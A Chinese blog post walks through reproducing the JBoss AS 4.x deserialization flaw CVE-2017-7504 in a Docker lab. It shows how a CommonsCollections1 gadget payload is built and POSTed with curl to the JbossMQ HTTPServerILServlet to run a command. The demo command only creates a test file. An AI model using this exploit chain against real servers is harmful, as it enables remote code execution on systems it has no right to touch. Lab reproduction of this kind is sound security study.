• jboss反序列化漏洞复现(CVE-2017-7504)

    jboss反序列化漏洞复现(CVE-2017-7504)

    一、漏洞描述

    Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

    二、漏洞环境搭建以及复现

    1、使用docker搭建漏洞环境及复现

    Docker-compose build

    docker-compose up -d

    2、浏览器访问http://172.17.0.1:8080/,测试环境是否搭建成功

      

    3、下载测试工具, 下载地址:https://github.com/joaomatosf/JavaDeserH2HC

    我们选择一个Gadget:ExampleCommonsCollections1WithHashMap,编译并生成序列化数据:

    javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

    java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"

    可见,我们执行的命令是touch /tmp/success。执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.ser

      

    4、将该文件作为body发送如下数据包:

    curl http://172.17.0.1:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ExampleCommonsCollections1WithHashMap.ser

      

    5、验证是否成功,在docker环境中执行docker-compose exec jboss bash,下图可以看到成功创建了success文件,说明漏洞存在

      

    -------------------------------------------------------------------------------------------------

    参考: https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-7504

     
  • 相关阅读:
    MySQL max_allowed_packet设置及问题
    centos 7 编译安装mysql 详细过程
    如何快速查看mysql数据文件存放路径?
    centos yum 库更新
    centos 7 ifconfig 命令找不到
    http协议
    前端那些事儿
    C++接口的定义与实现的详细过程
    List转为字符串
    spring cloud spring boot JPA 克隆对象修改属性后 无法正常的执行save方法进行保存或者更新
  • 原文地址:https://www.cnblogs.com/yuzly/p/11240101.html
Copyright © 2020-2023  润新知